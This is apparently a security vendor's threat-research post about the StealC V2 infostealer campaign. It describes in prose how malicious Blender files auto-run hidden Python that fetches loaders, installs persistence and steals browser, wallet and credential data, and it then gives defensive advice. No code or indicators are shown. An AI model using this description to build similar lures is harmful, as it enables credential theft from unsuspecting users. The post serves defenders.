Comprehensive Threat Exposure Management Platform
Critical Threat Research : Middle-East at WAR: The Rapidly Escalating Iranian Cyber Threat Download the Report Critical Threat Research : Middle-East at WAR: The Rapidly Escalating Iranian Cyber Threat Download the ReportThe StealC V2 malware campaign represents a sophisticated attack leveraging malicious Blender files to distribute the StealC V2 infostealer to unsuspecting users worldwide. Discovered in 2025, the StealC V2 attack exploits Blender’s Python script auto-execution capabilities by embedding weaponized code inside seemingly harmless .blend 3D model files shared on popular asset platforms like CGTrader. The StealC V2 campaign has been active for at least six months, with evidence linking the operation to Russian-speaking threat actors. The StealC V2 infostealer infection chain initiates when victims open malicious Blender files, triggering concealed Python scripts that automatically download loaders, PowerShell scripts, ZIP bundles, and establish a full Pyramid C2 infrastructure. The StealC V2 malware targets Windows, macOS, and Linux platforms, harvesting sensitive data from over 23 browsers, more than 100 plugins and extensions, cryptocurrency wallets, messaging applications, VPN clients, and email programs. The StealC V2 threat demonstrates how attackers weaponize trusted creative tools to transform legitimate workflows into unexpected vectors for cyber intrusion and data theft.
The StealC V2 malware campaign exploits Blender Foundation files to deliver the rapidly evolving StealC V2 infostealer through a sophisticated multi-stage attack chain. For at least six months, StealC V2 operators have been quietly uploading malicious .blend files to platforms like CGTrader, disguising them as ordinary 3D assets. When opened in Blender, these StealC V2-weaponized files trigger concealed Python scripts that run automatically, transforming a trusted creative tool into a silent malware delivery mechanism.
Blender’s widespread popularity among 3D artists and designers plays a crucial role in the StealC V2 campaign’s success. As a free, open-source 3D creation suite supporting modeling, animation, rendering, and a thriving ecosystem of add-ons across all major operating systems, Blender attracts millions of users worldwide. The platform’s flexibility and community-driven growth make it ideal for professionals and hobbyists alike. However, this same flexibility introduces risk that StealC V2 attackers exploit. Blender allows Python scripts to be embedded directly into .blend files, and when Auto Run is enabled, those scripts execute instantly upon opening, creating opportunities for StealC V2 operators to weaponize the platform.
Although the Blender community had previously sounded general warnings about malicious Blender files, none of those discussions connected the activity to StealC V2 or any recognized threat actor. New evidence now suggests ties to Russian-speaking operators whose StealC V2 distribution tactics resemble earlier campaigns, including those impersonating the Electronic Frontier Foundation (EFF) to target Albion Online players. Both StealC V2 operations share familiar attack patterns including deceptive lure files, background execution chains, and the use of Pyramid C2 infrastructure to manage attacks.
The StealC V2 attack begins when a user opens a malicious .blend file containing weaponized Python scripts. If script auto-execution is enabled, the StealC V2 script retrieves a loader from a remote server, which then downloads a PowerShell script responsible for pulling down two ZIP archives. One archive contains a Python environment housing StealC V2, while the other delivers an auxiliary Python-based stealer component. These StealC V2 components unpack into the %TEMP% directory, where hidden LNK files are executed and made persistent via the Windows Startup folder. The StealC V2 infection chain culminates in the deployment of a Pyramid C2 module, where ChaCha20-encrypted Python scripts fetch additional payloads.
The final StealC V2 payload represents a powerful infostealer that has rapidly evolved since its introduction in April 2025. StealC V2 supports data extraction from more than 23 browsers, over 100 plugins and extensions, numerous cryptocurrency wallets, messaging applications, VPN clients, and email clients. The StealC V2 malware features an upgraded UAC bypass mechanism, enabling it to operate with elevated privileges without user consent. The StealC V2 campaign serves as a critical reminder of how even trusted creative tools can be weaponized by sophisticated threat actors, underscoring the growing need for cautious file handling practices and stronger security awareness training across creative industries.
Be Cautious when Downloading 3D Assets: The StealC V2 campaign relies on users downloading malicious Blender models from compromised or malicious sources. Only download Blender models from trusted creators or verified marketplaces with strong reputation systems. If a StealC V2 lure file looks unusual, has very few downloads, or comes from an unknown uploader, avoid opening it. Verify the authenticity of 3D assets before use to prevent StealC V2 infection.
Disable Auto Run for Python Scripts in Blender: StealC V2 attacks exploit Blender’s Auto Run feature that allows embedded Python scripts to execute automatically upon opening .blend files. Navigate to Edit → Preferences → File Paths in Blender and ensure Auto Run is disabled unless absolutely necessary for your workflow. Disabling Auto Run breaks the StealC V2 infection chain at the initial execution stage, preventing automatic malware deployment.
Scan Downloaded Files Before Opening: Even if a Blender file appears harmless and legitimate, StealC V2 operators disguise malicious code within seemingly normal 3D assets. Run all downloaded .blend files through antivirus or endpoint security tools before opening them in Blender. This scanning step can detect StealC V2 signatures and behavioral indicators before the malware executes.
Review Your Startup Folder Regularly: StealC V2 malware achieves persistence by hiding malicious shortcuts (LNK files) in the Windows Startup folder to execute every time the system boots. Regularly inspect your Startup folder for suspicious entries and remove any unfamiliar LNK files. Eliminating these persistence mechanisms can prevent StealC V2 from re-establishing control after system restarts.
Enhance Endpoint Protection: Deploy next-generation antivirus (NGAV) and endpoint detection and response (EDR) solutions specifically configured to detect StealC V2 behaviors. Leverage behavioral analysis and machine learning-based detection to identify suspicious StealC V2 activity patterns such as Python script execution from %TEMP%, unusual PowerShell activity, ChaCha20 encryption operations, and data exfiltration to known Pyramid C2 infrastructure. EDR solutions provide multiple opportunities to interrupt the StealC V2 kill chain across its multi-stage infection process.
IPv4 Addresses:
URLs:
SHA256 Hashes:
Initial Access:
Execution:
Persistence:
Privilege Escalation:
Defense Evasion:
Credential Access:
Collection:
Command and Control:
Exfiltration:
Get through updates and upcoming events, and more directly in your inbox